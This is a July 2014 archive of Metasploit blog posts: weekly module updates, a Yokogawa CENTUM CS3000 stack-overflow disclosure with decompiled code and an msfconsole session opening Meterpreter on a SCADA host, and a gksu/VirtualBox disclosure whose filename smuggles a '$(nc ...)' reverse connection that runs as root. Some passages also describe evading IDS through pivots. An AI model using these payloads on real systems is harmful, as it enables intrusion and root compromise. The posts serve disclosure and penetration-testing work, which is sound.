Skip navigation
All Places > Metasploit > Blog > 2014 > July
2014

Don't Be (too) Naked in Vegas

Wow, it's exactly two more weeks today until DEFCON. While Rapid7 has had a vendor presence at Black Hat for many years (at booth #541), this year is, I believe, the first time that we'll have a vendor table at DEFCON. I'm super stoked about both gigs, since the Black Hat booth will give us an opportunity to unload give away a fresh new batch of Metasploit T-Shirt Design contest artifacts designed by contest winner R-OR. Check it out, pictured at right. For the DEFCON table, we'll be gouging selling a specially-branded, retro-designed T-shirt as an EFF fundraiser, since we really dig the idea of independent security researchers not going to jail for contributing their free time to various open source security projects, like ours.

 

defcon-tshirt-2014.png

I really, really like the fact that Rapid7 has taken to open-sourcing our conference swag. It resonates so well with our open source security mission. It would be so easy -- and wrong -- to try to bottle up Metasploit and take the open source projects into crippleware land. Rapid7 could reserve all the cool stuff (code AND T-shirts) for paid customers, but that's just not in our DNA. Incidentally, it would also be a disaster. Metasploit's strength, relevance, and effectiveness is hugely dependent on the efforts of the open source security community.

 

Now, don't get me wrong, there is some cool stuff in Metasploit Pro that you won't find elsewhere, but we remain committed to keeping the core functionality and content free and available on the Internet. Perhaps this is irrational, and it's definitely radical (in both the literal and 80's slang senses), but it's what keeps me, at least, still fired up and passionate about the social and technical missions for Metasploit.

 

If you'd like to meet some of the people who make Metasploit go, please drop by our table at the vendor room at DEFCON.

 

Speaking of giving away our secret sauce for free...

 

Metasploit Credential Overhaul

A few days ago, we published a new branch at our GitHub repository: the staging/electro-release branch, and the metasploit-credential repository which features an overhaul of how Metasploit credential management works. These aren't the credentials you might use to log into Metasploit Pro, mind you, these are the credentials that you pick up by some of the hundreds of password-stealing / -guessing / -cracking modules. In these days of common, default, reused, and predictable passwords for common and not-so-common devices and applications, it's difficult to justify a penetration testing engagement without having a solid run at scoring some of the client's passwords.

 

The idea behind the Metasploit Credential gem is to have a "fully-fledged data model for tracking, storing, importing, and reasoning about credential data," to quote Trevor Rosen, my counterpart and engineering manager for the Metasploit Applications development team here at Rapid7. It's cool computer-sciencey stuff. If you're interested in diving in, feel free to clone the GitHub repo, check out the online documentation (pulled entirely from source), and start poking around in there. None of this is in the master Framework repo yet, so don't worry too much about what all this might mean for you yet. But, we wanted to give exploit devs a heads-up about what's coming up for the next version of Metasploit.

 

We'll have some documentation up in just a few days, right before the pilgrimage to Las Vegas. Also, there will be some exciting news related to this open source rework. Keep an eye out.

 

New Modules

We have seven new modules this week, including a trio of auxiliary modules by David Bloom taking advantage of some weaknesses in DbVisualizer. Also, pay special attention to Jon Hart's most excellent NTP Protocol Fuzzer, which you should absolutely never use against a production environment unless you want to make a point about Denial of Service attacks, such as, "Hey, are you using Kerberos? When your NTP server gets borked, how do you login?" That kind of thing.

 

Exploit modules

 

Auxiliary and post modules

 

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

D-Link Embedded Device Shells

This week, esteemed Metasploit contributor @m-1-k-3 has been at it again with his valiant personal crusade against insecure SOHO (small office/home office) embedded devices with known vulnerabilities. We have a new trio of modules that target D-Link gear, based on the research released by Craig Heffner and Zachary Cutlip, which exploit two bugs present in the DSP-W215 Smart Plug, and one UPnP command injection bug found in the DIR-815.

 

The research on these embedded devices is really quite solid -- if you're at all interested in this kind of research, you can Craig's excellent notes on his first and second SmartPlug bugs, published in May of 2014, and Zachary's notes on the DIR-815 bug. Following along is now a ton easier with m-1-k-3's Metasploitization of these exploits, too, since you can now see the traffic on the wire if you happen to have one of these routers in your home or lab.

 

This is the part where I rail about the Internet-of-Things. I'll keep beating this drum because it's not "merely" your home networks that are at risk. If the gadgets are cool and useful enough, you can be sure they will find their way into office spaces across all kinds of industries, making the job of the penetration tester less of an exercise in finding vulnerable devices to target and more of prioritizing which ones should get exploited first.

 

Nobody updates firmware, ever. Nobody.  As long as they're passing packets, and there's no IT department control over these things, these guys will remain vulnerable forever -- at least, until something radical changes in the embedded device space where updates are automatic and routine -- and don't fall prey to Evilgrade-like attacks, which have been around for a few years now.

 

Rubocop

Back in Metasploit developer land, we've had some good discussion this week on how to nudge the quality of code we get from our beloved contributors up the maintainability scale. Rapid7's Jon Hart suggested, and then promptly implemented, some hooks to Rubocop, a style-checker based on the well-regarded Ruby Style Guide by eYQPa9Y.jpg?1Bozhidar Batsov and friends.

 

So, as of now, default runs of msftidy.rb will include a Rubocop check. The best part of Rubocop is that it can allow for some level of automatic code fix ups, if you launch it with the -a argument. While we don't want to fix your code out from under you, you can at least get a sense of your style guide conformance if you hook up msftidy to your own local git pre-commit hook.

 

It's important to make clear that style is kind of important for maintainability. If you're involved in an open source endevor and you have more than one contributor to your code base, having multiple, personal styles is not only difficult to read in any sane development environment, but makes the likelihood of logic bugs creeping into your code much, much higher. Please believe me, we're not trying to make Metasploit contribution less fun by sticking to reasonable standard coding practices -- we're trying to make the code base, as a whole, more accessible, more reliable, and as bug free as we possibly can.

 

You can see rubocop -a in action over on Pull Request #3543, where we apply some automatic fixes on the tried-and-true MS08-067 module. Keep in mind we're still experimenting here -- if you have a module that doesn't hit the style guide 100%, we're not going to hold it against you, and won't block commits because of it. Hopefully, though, this kind of automatic syntax checking will go a long way to shoveling more awesome into Metasploit faster.

 

New Modules

As reviewed above, we have three new exploits, all D-Link, and one new auxiliary module, which targets Michele Spagnuolo's Rosetta Flash vulnerability, CVE-2014-4671.

 

Exploit modules

 

Auxiliary and post modules

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Hopping Meterpreter Through PHP

 

This week, Metasploit landed and shipped the new Reverse HTTP hop stager for Meterpreter payloads, which opens up yet another avenue for pivoting about the Internet to connect to your various and sundry Meterpreter shells. This is kind of a huge deal.

 

For starters, this obviously helps with crossing artificial borders between networks. You may have an engagement target that has a vulnerable web server in a DMZ that's running PHP, so you can use that machine as a quick and easy Meterpreter pivot point into the nominally "separate" network on the other side.

 

In addition, this kind of hopping behavior can help a lot with staying undetected by the pen-test target's IDS and IPS. Imagine that you know that a certain machine or range is on an exclusion list for alerting (which is all to often the case when IT security folks are having trouble tuning out false positives from certain devices). The enterprising attacker can take control of that purposely-ignored device, pop stand up a quick Nginx server with PHP and start rerouting all his otherwise suspicious traffic through there.

 

If you're interested in seeing this bad boy in action, you're invited to check a screencast of the payload:

 

Tons of thanks to Matt @scriptjunkie Weeks for his effort on this, and for casually mentioning this feature at a recent hacker BBQ here in Austin.

 

New Modules

We've four new exploits and one new auxiliary module this week for Metasploit users, including one for the long-anticipated, recently disclosed Yokogawa vulnerability, CVE-2014-3888.

 

Exploit modules

 

Auxiliary and post modules

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows, either the totally free Metasploit Community Edition, or the 14-day free trial of Metasploit Pro. If you're the sort to track bleeding-edge development code, then these modules are but an msfupdate command away. For readers who are already using Metasploit Community or Metasploit Pro, you'll be able to install the new hotness today via the Administration : Software Updates button.

 

For additional details on what's changed and what's current, please see Chris Doughty's most excellent release notes.

Last March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. As noted in the talk, we are releasing information about all of the vulnerabilities we found in the product at the time. Today, we're disclosing the last one of the discovered vulnerabilities.

 

For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

 

Vulnerability Summary

 

The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKFSim_vhfd.exe” service, started when running the “FCS / Test Function” for extended virtual testing, listens by default on 20010 (TCP and UDP). By sending a specially crafted packet to the port UDP/20010 it’s possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

 

Disclosure Timeline

 

DateDescription
Mar 5, 2014Initial contact to Vendor
Mar 10, 2014Vendor advised contacting CERT/CC, JPCERT
Mar 11, 2014Disclosed to CERT/CC, CVE-2014-3888 assigned
May 07, 2014Metasploit module published in Pull Request #3499

 

Technical Analysis

 

The vulnerability exists in the function “sub_403E10” (IDA notation), used for logging purposes by the “BKFSim_vhfd.exe” service. The vulnerable function assembles log lines using a defined list of pre-formatted strings (format strings), and user controlled (tainted) data (in some cases). But it uses dangerous functions and static size stack buffers in order to do it, being the size of the buffers no longer enough for storing logs created with malicious user-controlled data.

 

Two vulnerable points have been found in the described function, which allow to corrupt two different stack buffers when logs are built with user controlled data:

 

BOOL sub_403E10(BOOL a1, const char *Format, ...)
{
  unsigned int v2; // ecx@1
  BOOL result; // eax@1
  unsigned int v4; // ebx@7
  void *v5; // edi@7
  HANDLE v6; // edx@7
  unsigned int v7; // ecx@7
  struct _SYSTEMTIME SystemTime; // [sp+0h] [bp-220h]@7
  DWORD NumberOfBytesWritten; // [sp+14h] [bp-20Ch]@7
  char Buffer[260]; // [sp+18h] [bp-208h]@7 // Overflow 2
  char Dest[260]; // [sp+11Ch] [bp-104h]@4 // Overflow 1
  va_list va; // [sp+22Ch] [bp+Ch]@1


  va_start(va, Format);
  HIWORD(v2) = 0;
  *((_WORD *)lpBaseAddress + 192) = 61;
  result = a1;
  LOWORD(v2) = *((_WORD *)lpBaseAddress + 177);
  if ( v2 >= a1 && Format && hObject != (HANDLE)-1 )
  {
    memset(Dest, 0, 0x100u);
    Dest[256] = 0;
    if ( strlen(Format) < 0x100 )
      vsprintf(Dest, Format, va);//Buffer Overflow 1: Dangerous use of vsprintf to copy data to the stack
    else
      sprintf(Dest, "data size too big (>= %i)", 256);
    GetLocalTime(&SystemTime);
    sprintf(
      &Buffer,
      "%02d/%02d/%02d %02d:%02d:%02d:%03d::sim_vhfd",
      SystemTime.wYear % 100,
      SystemTime.wMonth,
      SystemTime.wDay,
      SystemTime.wHour,
      SystemTime.wMinute,
      SystemTime.wSecond,
      SystemTime.wMilliseconds);
    v4 = strlen(Dest) + 1;
    v5 = &Buffer + strlen(&Buffer); // v5 points inside Buffer, after the log header
    memcpy(v5, Dest, 4 * (v4 >> 2)); // Buffer Overflow 2: Dangerous use of memcpy to copy data to the stack
    v6 = hObject;
    memcpy((char *)v5 + 4 * (v4 >> 2), &Dest[4 * (v4 >> 2)], v4 & 3);
    v7 = strlen(&Buffer);
    *(&Buffer + v7) = 13;
    Buffer[v7 - 1] = 10;
    WriteFile(v6, &Buffer, v7 + 2, &NumberOfBytesWritten, 0);
    result = FlushFileBuffers(hObject);
    *((_WORD *)lpBaseAddress + 192) = 62;
  }
  return result;
}






 

By sending specially crafted data to the UDP/20010 port, it’s possible to force a call to the vulnerable function with use controlled data of a size enough to overflow the stack buffers.

 

In order to demonstrate the vulnerability a malformed heartbeat (HealthFromUDP) package has been used. These packages are exchanged between the different HIS stations and the FCS simulator:

 

packets.png

According to our understanding of the packages:

 

  • The first 16 bytes are a header, were:
    • At offset 6 there is a two bytes packet identifier.
    • At offset 15 there is a one-byte packet length. 
  • The last 4 bytes are a trail.
  • The bytes between the header and the trail are the exchanged data (HIS station identifier in this case).

 

packet.png

 

  • Command/operation (heartbeat)
  • Packet Length
  • Data (HIS identifier)

 

When a packet like the above is received, the vulnerable program will try to build a log line with the next format:

 

"ERROR:HealthFromUDP():GetHostTblPosByName(hostname=%s) rtnno=%d"





 

And will use the HIS identifier to build the hostname, which leads to the already described buffer overflows.

 

Exploitation

 

Exploitation has been confirmed by sending a heartbeat packet with a long HIS Identifier in the Data field. In this way is possible to overflow the EIP saved on the stack (in fact it’s overwritten twice) and gain code execution since there isn’t stack cookie protection in the vulnerable function.

 

As proof of concept, a working exploit has been developed for Windows XP SP3 / Yokogawa Centum CS3000 R3.08.50, where is possible to gain arbitrary code execution:

 

msf > use exploit/windows/scada/yokogawa_bkfsim_vhfd

msf exploit(yokogawa_bkfsim_vhfd) > set RHOST 172.17.1.63

RHOST => 172.17.1.63

msf exploit(yokogawa_bkfsim_vhfd) >

msf exploit(yokogawa_bkfsim_vhfd) > rexploit

[*] Reloading module...

 

 

[*] Started bind handler

[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3 (English), sending 789 bytes...

[*] Sending stage (769024 bytes) to 172.17.1.63

[*] Meterpreter session 1 opened (172.17.1.1:58714 -> 172.17.1.63:4444) at 2014-02-17 23:03:24 +0100

 

 

meterpreter > getuid

Server username: HIS0163\CENTUM

meterpreter > sysinfo

Computer        : HIS0163

OS              : Windows XP (Build 2600, Service Pack 3).

Architecture    : x86

System Language : es_ES

Meterpreter     : x86/win32

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.

Poisoning VirtualBox via Crafted Filenames

When I began researching this, I believed the vulnerability laid within Virtualbox, but I realized this was not true after a bit. The vulnerability being hit is actually within gksu itself. In fact, virtual box did everything right (sort of). I do take advantage of a weakness in the way they validate their extension packs, but the reason the vulnerability results in a root shell is because the vulnerability is hit after gksu escalates privs to root. You *must* install the extension pack via the helper app, so that means double clicking or opening from the graphical UI. This also works when reinstalling the same (but maliciously-renamed) extension pack.

 

Incidentally, this bug was already reported in the maintainer's bug tracker, but it seems unclear of the true, dangerous scope of the bug, when it comes to things like VirtualBox, various package manageres, et cetera.

 

Disclosure Timeline

Below is the timeline Brandon Perry and Rapid7 followed to disclose this issue.

 

DateAction
Aug 15, 2013 (Thu)Vulnerable behavior first noticed (approximately)
Apr 28, 2014 (Wed)Submitted to HP's ZDI program for consideration
Apr 30, 2014 (Wed)Entrusted to Rapid7 for disclosure
May 21, 2014 (Wed)Disclosed to vendor, Gustavo Nohornha Silva
Jun 06, 2014 (Fri)Disclosed to CERT/CC
Jun 10, 2014 (Tue)CVE-2014-2943 assigned
Jul 07, 2014 (Mon)Public Disclosure

 

Vulnerability Details

A linux system with KDE installed will likely not be vulnerable to this, as the code path to use gksu asks if kdesudo is installed before asking if gksu is installed. The logic that dictates this is within VBoxExtPackHelperApp.cpp around line 1429. Per the comment above the logic, this will likely be fixed for Virtualbox if it is rewritten to use PolicyKit.

 

 

In order to hit the vulnerability on a default Ubuntu install, you must change the ‘sudo-mode’ key to be unchecked in the /apps/gksu schema in gconf which will make gksu require the ‘root’ user’s password as opposed to the current user’s password since it will achieve privilege escalation using ‘su’ and not ‘sudo’. On CentOS, for instance, this is not needed as this is default.

 

 

The vulnerability lies in the filename. At the time of writing, there is only one known VirtualBox extension pack. It is offered by Oracle on their website along with the virtual box installer. This adds proprietary functionality. It is called:

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack

 

 

When Virtualbox is opening this, it checks the filename against a stored value within the ext pack and ensures they match. If they do not, then virtual box bails. You can get around this, however, with a little bit of trickery.

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.fdsa.vbox-extpack

 

 

By appending directly to the end, you can bypass the filename check. By appending an extra .vbox-extpack, an administrator can still double click the file and have the window manager open virtual box to install the extension pack.

 

 

In order to take advantage of the vulnerability in gksu, you can create a small test that connects back with a netcat session.

 

 

Oracle_VM_VirtualBox_Extension_Pack-4.3.4.vbox-extpack.$(nc 192.168.1.99 4444).vbox-extpack

 

 

By passing this to gksu, gksu will pass the payload to ‘gksu-run-helper’ as an argument in “double” quotes. When gksu executes the gksu-run-helper command as root, the payload is evaluated within the double quotes (even though virtualbox single quoted them!).

 

 

Within the gksu_su_fuller function in libgksu.c ~line 1928, you will find gksu builds the string that it will be eventually running. ~line 1996 and 1997 looks like this:

 

 

1996      cmd[i] = g_strdup_printf ("%s \"%s\"", auxcommand,

1997        context->command); i++;

 

 

auxcommand is ‘gksu-run-helper’ and context->command is the command that will be run in the context of the root user. You can see that it uses “double” quotes to encapsulate the command.

 

 

Here is a ps aux listing of what the execution progression is, note the increasing pids:

 

 

bperry    9708  0.0  0.4 106352  4272 ?        S    19:23  0:00 /usr/lib/virtualbox/VBoxExtPackHelperApp install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name Oracle VM VirtualBox Extension Pack --tarball /home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ext pack.$(nc 192.168.1.31 4444).vbox-extpack --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace

 

 

bperry    9710  1.6  1.0 186440 11100 ?        S    19:23  0:00 /usr/bin/gksu /usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace

 

 

root      9715  0.0  0.1  59928  1780 pts/2    Ss+  19:23  0:00 /bin/su root -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"

 

 

root      9724  0.0  0.1  12380  1252 ?        Ss  19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"

 

 

root      9725  0.0  0.0  12380  672 ?        S    19:24  0:00 bash -c /usr/lib/libgksu/gksu-run-helper "/usr/lib/virtualbox/VBoxExtPackHelperApp --stdout /tmp/VBoxExtPackHelper-qma0nm/stdout --stderr /tmp/VBoxExtPackHelper-qma0nm/stderr --elevated install --base-dir /usr/lib/virtualbox/ExtensionPacks --cert-dir /usr/share/virtualbox/ExtPackCertificates --name 'Oracle VM VirtualBox Extension Pack' --tarball '/home/bperry/Downloads/Oracle_VM_VirtualBox_Extension_Pack-4.3.8-92456.vbox-ex tpack.$(nc 192.168.1.31 4444).vbox-extpack' --sha-256 eb364239fc399416af6c985b3082bfbdd206d42a60e7af98ffba13d60912b864 —replace"

 

 

The above output was taken while virtual box was frozen because I had not dropped the connection made between the vm and another machine(you can try this yourself). The last command run is the gksu-run-helper command with our command in “double” quotes. If you hit the vulnerability properly, the bash metacharacters will not appear in the final command ran, and virtual box will error out because the file it is looking for will not exist (unless the attacker can create it?).

 

 

This vulnerability could easily affect other applications that users must escalate privileges for to use (package managers come to mind). Using this method, attackers could craft special files that match MD5 sums, but that are actually quite malicious with bash metacharacters hidden in them that get parsed as root.

 

You may watch a short video detailing and demoing the vuln on YouTube:

 

gksu-video.png

Screen Shot 2014-07-02 at 1.48.48 PM.pngIn this week's Metasploit update, we'd like to introduce two sandbox escaping exploits for Internet Explorer, and demonstrate how you're supposed to use them. The two we're covering are MS13-097, an escape due to Windows registry symlinks. And MS14-009, by exploiting a type traversal bug in .Net Deployment Service. We will also briefly go over other new modules and new changes, and here we go.


Why You Need a Sandbox Escape in Internet Explorer

 

A couple of years ago, exploiting Internet Explorer was pretty straight forward. In most cases you'd only need one exploitable vulnerability to gain arbitrary code execution, and you had lots of freedom under the context of the user. Well, times have changed quite a bit since the birth of Protected Mode, and it has become even harder with Enhanced Protected Mode. Nowadays, a single vulnerability is no longer enough in newer Internet Explorer, you most likely need multiple flaws, with at least one of them being a sandbox bypass, and then you chain them together in order to actually do some real damage. Here's an example of what it's like to operate under Internet Explorer 11's Enhanced Protected Mode:

 

Screen Shot 2014-07-01 at 3.58.31 PM.png

 

As you can see, my meterpreter shell can't even create a directory under process iexplore.exe due to low privileges, so we're going to have to escalate. Let's pick exploit/windows/local/ms14_009_ie_dfsvc as an example, which is used the way you would with pretty much any other local privilege escalation modules:

 

Screen Shot 2014-07-01 at 4.11.25 PM.png

 

Much better. Looks like we have more freedom to do more stuff to the system.

 

Although the MS14-009 module was intended for Enhanced Protected Mode during development, it should also work fine against different patch levels of Internet Explorer as long as the .Net Framework version is outdated (4.5.0, 4.5.1, or older). There is also a check() method implemented, which you can call on your own by using the "check" command. But the exploit will call check() anyway when you try to use it, so it's a bit safer to use than the other sandbox bypass exploit. The MS13-097 module is pretty much used the same way, but is more specific to Internet Explorer. There is no check implemented in that one, so use it at your own risk.


Special thanks to James Forshaw for the above discoveries and proof of concepts, and Juan Vazquez for the Metasploit modules.

 

More Goodies

 

  • exploit/windows/http/cogent_datahub_command - This week's release also includes an exploit for Cogent DataHub 7.3.5, a human-machine interface that's designed to manage embedded data at real-time. I'm sure you guys (and gals) aren't crazy enough to fire exploits directly against any SCADA systems in production, but still it's important to remind you that using this module will most likely cause the remote service to hang, and must be restarted manually, which explains why this is a Manual Ranking module.
  • exploit/windows/http/hp_autopass_license_traversal - This is a licensing server made by HP, which is exploitable due to not enforcing any authentication, and suffers from a directory traversal that allows you to upload a malicious JSP payload file to compromise the machine. This is actually kind of a typical problem in web applications, HP unfortunately is no exception to this.
  • auxiliary/scanner/ssh/cerberus_sftp_enumusers - Originally found by Steve Embling, and submitted by our new Metasploit contributor Matt Byrne. You can use this module to enumerate users from Cerberus FTP via the SSH service. Useful during information gathering, because you know what they say: "If I had eight hours to chop down a tree, I’d spend the first six of them sharpening my axe."

 

Other Changes

 

  • Additional support of WEP, PSK, and MGT for module auxiliary/gather/chromecast_wifi
  • Improved SMB client API - Mainly we did some work with how SMB's recv method handles data with caching, and being more tolerant on out-of-sync SMB responses for more reliability. We also reworked the auxiliary/gather/windows_deployment_services_shares module to adapt the new changes.
  • Fixed a NoMethodError bug in struts_code_exec_parameters

 

If you're new to Metasploit, feel free to get started with the free version here for either Linux or Windows, or get the trial version of Metasploit Pro for serious pwnage. For those who already use Metasploit, make sure to run the msfupdate command and get the latest changes, GUI users (Pro and Community) should use the Software Update button instead.

 

For additional details about this update, please see the release notes.

 

May the force be with you.

Filter Blog

By date: By tag: